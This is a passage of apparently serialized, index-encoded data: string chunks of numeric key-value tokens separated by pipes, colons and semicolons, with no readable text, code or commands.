- ..'1:45|25:48;12|1:45|25:49;12|1:45|25:50;12|1:45|25:51;12|1:45|25:52;12|1:45|25:53;12|1:45|25:54;1|1:55|5:37|3:56|15:21|16:57|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;p;12|1:45|25:58;12|1:45|25:59;12|1:45|25:60;12|1:45|25:61;12|1:45|25:62;12|1:45|25:63;12|1:45|25:64;12|1:45|25:65;12|1:45|25:66;12|1:45|25:67;12|1:45|25:68;12|1:45|25:67;12|1:45|25:69;1|1:70|5:37|3:71|15:21|16:72|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:44;p;1|1:73|5:37|3:74|15:21|16:75|4:40|17:24|26:25|18:24|5:37|5:37;n;11|22:41|23:42|24:43;9|9:10|10:44;p;12|1:45|25:76;12|1:45|25:77;12|1:45|25:78;12|1:45|25:79;12|1:45|25:80;12|1:45|25:81;12|1:45|25:82;12|1:45|25:81;1|1:83|5:84|3:85|15:21|16:86|4:87|17:24|5:84|5:84;n;7;9|9:10|10:88;p;12|1:45|25:89;12|1:45|25:90;12|1:45|25:91;12|1:45|25:92;12|1:45|25:93;12|1:45|25:94;12|1:45|25:95;12|1:45|25:96;12|1:45|25:97;12|1:45|25:98;12|1:45|25:99;12|1:45|25:100;12|1:45|25:101;12|1:45|25:102;12|1:45|25:103;12|1:45|25:104;12|1:45|25:105;12|1:45|25:106;12|1:45|25:107;12|1:45|25:108;12|1:45|25:109;p;7;8|1:110;8|1:111;2|1:112;n;1|1:113|5:32|3:114|15:115|16:116|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:119|10:120;p;1|1:113|5:84|3:121|15:21|16:122|4:123|27:25|17:25|18:25|5:84|5:84;n;11|22:118|24:25;9|9:124|10:125;p;1|1:113|5:32|3:126|15:21|16:127|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:130|29:24;p;1|1:113|5:131|3:132|15:133|16:134|4:135|17:25|18:25|5:131|5:131;n;11;p;1|1:113|5:19|3:136|15:137|16:138|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:119|10:140;9|9:141|10:142;9|9:141|10:143;p;1|1:113|5:19|3:144|15:137|16:145|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;p;1|1:113|5:32|3:147|15:115|16:148|4:117|27:25|17:24|18:25|5:32|5:32;n;11|22:118|24:25;9|9:119|10:120;p;1|1:113|5:19|3:149|15:150|16:151|4:139|27:25|17:24|18:24|5:19|5:19;n;11|22:118|24:129;p;1|1:113|5:84|3:1'
- ..'52|15:153|16:154|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:158|10:159;9|9:160|10:161;9|9:162|10:163;9|9:160|10:164;9|9:160|10:165;p;1|1:113|5:9|3:166|15:150|16:167|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:169|10:170;9|9:171|10:172;p;1|1:113|5:19|3:173|15:150|16:174|4:175|17:25|18:24|5:19|5:19;n;11|22:118|24:129;9|9:176|10:177;9|9:178|10:179;p;1|1:113|5:9|3:180|15:150|16:181|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:158|10:183;9|9:158|10:184;9|9:185|10:125;9|9:176|10:186;p;1|1:113|5:131|30:187|3:188|15:133|16:189|4:190|17:25|18:25|5:131|5:131;n;11|22:191;9|9:192|10:193;p;1|1:113|5:131|3:194|16:195|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:158|10:198;9|9:158|10:199;9|9:158|10:200;9|9:162|10:201;9|9:158|10:202;p;1|1:113|5:32|3:203|15:21|16:204|4:128|27:25|17:25|18:24|5:32|5:32;n;11|22:118|24:129;13|28:205|29:157;p;1|1:113|5:84|3:206|15:207|16:208|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;p;1|5:19|3:211|15:115|16:212|4:213|17:24|18:214|5:19|5:19;n;4|9:215|10:216;9|9:217|10:218;p;1|1:113|5:131|3:219|15:133|16:220|4:135|17:25|18:25|5:131|5:131;n;11;9|9:221|10:222;9|9:223|10:224;p;1|1:113|5:131|30:187|3:225|15:133|16:226|4:190|17:25|18:25|5:131|5:131;n;11|22:191;9|9:221|10:227;p;1|1:113|5:84|3:228|15:207|16:229|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;p;1|1:113|5:131|3:230|16:231|4:196|31:7|17:24|26:25|18:24|5:131|5:131;n;11|22:197|24:157;9|9:162|10:201;p;1|5:19|3:232|15:115|16:233|4:234|17:24|18:24|5:19|5:19;1|1:113|5:19|3:235|15:21|16:236|4:123|27:25|17:25|18:25|5:19|5:19;n;11|22:118|24:25;9|9:237|10:238;9|9:162|10:239;9|9:124|10:240;p;1|1:113|5:19|3:241|15:242|16:243|4:139|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:141|10:244;p;1|1:113|5:84|3:245|15:115|16:246|4:247|27:25|17:157|18:25|5:84|5:84;n;11|24:25;9|9:124|10:248;p;1|1:113|5:19|3:249|15:137|16:250|4:139|27:25|17:24|18'
- ..':24|5:19|5:19;n;11|22:118|24:129;9|9:119|10:251;9|9:252|10:253;p;1|1:113|3:254|15:115|16:255|4:247|27:25|17:157|18:25;n;11|24:25;9|9:256|10:257;9|9:124|10:248;4|9:258|10:259;9|9:260|10:261;p;1|5:84|3:262|15:21|16:263|4:264|31:7|17:24|32:25|18:25|5:84|5:84;n;9|9:265|10:266;9|9:10|10:267;9|9:268|10:269;9|9:270|10:271;p;1|5:32|3:272|15:153|16:273|4:274|31:7|18:24|5:32|5:32;n;9|9:265|10:275;9|9:221|10:276;p;1|5:19|3:277|15:115|16:278|4:213|17:24|18:214|5:19|5:19;n;9|9:260|10:279;p;1|1:113|5:9|3:280|15:281|16:282|4:168|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;p;1|1:113|5:84|3:283|15:21|16:284|4:155|17:24|26:25|18:24|5:84|5:84;n;11|22:156|24:157;9|9:162|10:285;9|9:162|10:286;9|9:162|10:287;9|9:162|10:288;9|9:158|10:289;9|9:158|10:290;9|9:158|10:291;9|9:158|10:292;9|9:158|10:293;9|9:160|10:294;9|9:160|10:295;p;1|1:113|5:19|3:296|15:297|16:298|4:299|27:25|17:157|26:25|18:25|5:19|5:19;n;11|24:25;9|9:217|10:300;9|9:217|10:301;9|9:217|10:302;4|9:303|10:304;9|9:217|10:305;9|9:306|10:307;9|9:308|10:309;p;1|1:113|5:32|3:310|15:21|16:311|4:312|27:25|18:25|5:32|5:32;n;11|24:25;9|9:306|10:313;9|9:217|10:314;p;1|5:19|3:315|15:115|16:316|4:234|17:24|18:24|5:19|5:19;n;9|9:124|10:317;9|9:318|10:319;9|9:124|10:320;p;1|1:113|5:84|3:321|15:207|16:322|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;9|9:256|10:323;p;1|1:113|5:19|3:324|15:325|16:326|4:196|31:7|17:24|18:24|5:19|5:19;n;11|22:327|24:157;p;1|1:113|5:19|3:328|15:137|16:329|4:175|27:25|17:25|18:24|5:19|5:19;n;11|22:118|24:129;p;1|1:113|5:19|3:330|15:242|16:331|4:146|27:25|17:24|18:25|5:19|5:19;n;11|22:118|24:25;9|9:119|10:332;p;1|1:113|5:19|3:333|15:325|16:334|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;9|9:119|10:336;9|9:119|10:337;p;1|1:113|5:32|3:338|15:21|16:339|4:312|27:25|18:25|5:32|5:32;n;11|24:25;4|9:340|10:341;p;1|1:113|5:84|3:342|15:207|16:343|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;9|9:345|10:346;'
- ..'p;1|5:19|3:347|15:21|16:348|4:349|31:7|5:19|5:19;n;4|9:350|10:351;9|9:158|10:352;4|9:353|10:354;p;1|1:113|5:84|3:355|15:207|16:356|4:209|17:25|18:25|5:84|5:84;n;11|22:210|24:129;p;1|1:113|5:19|3:357|15:297|16:358|4:299|27:25|17:157|21:25|18:25|5:19|5:19;n;11|24:25;p;1|1:113|5:9|3:359|15:281|16:360|4:182|27:25|17:25|18:25|5:9|5:9;n;11|22:118|24:25;9|9:162|10:361;9|9:162|10:362;9|9:185|10:363;p;1|1:113|5:19|3:364|16:365|4:335|31:7|27:25|18:25|5:19|5:19;n;11|24:25;9|9:252|10:366;9|9:119|10:367;9|9:119|10:368;p;1|1:113|5:84|3:369|15:370|16:371|4:344|31:7|17:157|18:25|5:84|5:84;n;11|24:25;9|9:372|10:373;4|9:340|10:374;9|9:252|10:375;p;1|5:19|3:376|15:21|16:377|4:349|31:7|5:19|5:19;n;9|9:162|10:378;4|9:353|10:379;p;1|1:113|5:380|30:187|14:381|3:382|15:325|16:383|4:384|31:7|18:24|5:380|5:380;n;11|22:385|24:157;p;1|1:113|5:32|3:386|15:325|16:387|4:388|31:7|17:24|18:24|5:32|5:32;n;11|22:389|24:157;9|9:178|10:390;9|9:391|10:392;p;p;p;1|2:2|3:393|4:4;n;3|5:5|4:6|6:7|7:8|8:9|5:5|5:5;4|9:192|10:394;p;2;n;1|2:2|5:131|14:395|3:396|15:397|4:398|5:131|5:131;n;4|9:141|10:399;p;1|2:2|5:131|14:395|3:400|15:401|4:398|5:131|5:131;n;4|9:141|10:402;p;1|1:403|2:2|5:404|3:405|15:406|4:407|18:24|5:404|5:404;n;14|1:408;n;7|1:409;n;7|1:410;p;8|1:411;7|1:412;p;p;1|2:2|5:131|14:395|3:413|15:397|4:414|5:131|5:131;n;4|9:141|10:415;p;1|2:2|5:131|14:395|3:416|15:401|4:398|5:131|5:131;n;4|9:141|10:417;p;1|2:2|5:131|14:395|3:418|15:397|4:419|18:24|5:131|5:131;7|1:420;p;1|1:421|2:2|5:19|3:422|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:426|15:153|4:427;n;4|9:428|10:429;p;1|1:421|2:2|5:19|3:430|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:431|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:432|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|'
- ..'8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:433|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:434|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:436|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:439|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:440|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:443|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:444|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:446|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:447|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:448|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:449|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:451|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:452|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:453|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:454|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:456|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:458|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:459|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:462|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:463'
- ..'|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:464|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:465|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|2:2|3:466|15:153|4:467;n;4|9:468|10:469;4|9:428|10:470;p;1|1:421|2:2|5:19|3:471|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:472|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:473|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:474|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:475|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:476|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:477|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:478|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:479|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:480|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:481|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:482|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:483|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:484|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:485|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:486|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:4'
- ..'24;p;1|1:421|2:2|5:19|3:487|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:488|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:489|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:490|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:491|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:492|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:493|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:494|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:495|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:496|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:497|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:498|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:499|15:445|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:500|15:435|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:501|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:502|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:503|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:504|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:505|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|'
- ..'4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:506|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:507|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:508|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:509|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:510|15:457|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:511|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:512|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:513|15:441|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:514|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:515|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:516|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:517|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:518|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:460|14:461|3:519|15:21|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:520|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:521|15:325|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:522|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:523|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:524|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1'
- ..'|1:421|2:2|5:19|3:525|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:526|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:527|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:528|15:325|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:529|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:530|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:531|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:532|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:533|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:534|15:325|4:455|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:535|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:536|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:538|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:539|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:540|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:541|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:542|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:543|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:544|15:537|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:545|4:327|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:4'
- ..'24;p;1|1:421|2:2|5:460|14:461|3:546|15:153|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:547|15:325|4:437|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:548|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:549|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:550|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:551|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:552|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:554|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:555|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:556|15:553|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:557|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:558|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:559|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:561|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:562|15:563|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:564|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:565|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:566|15:567|4:442|17:24|18:24;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:568|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:569|15:153|4:327|17:24|18:24|'
- ..'5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|14:461|3:570|15:325|4:423|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:571|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:572|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:573|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:574|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:575|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:576|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;7|1:450;p;1|1:421|2:2|5:19|3:577|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:578|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:19|3:579|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5:460|3:580|15:325|4:560|17:24|18:24|5:460|5:460;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|3:581|15:325|4:582|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|3:583|15:21|4:584|17:24|18:24;n;3|5:438|4:6|6:7|7:8|8:9|5:438|5:438;p;1|1:421|2:2|5:19|3:585|15:153|4:423|17:24|18:24|5:19|5:19;n;3|5:424|4:6|6:7|7:8|8:425|5:424|5:424;p;1|1:421|2:2|5: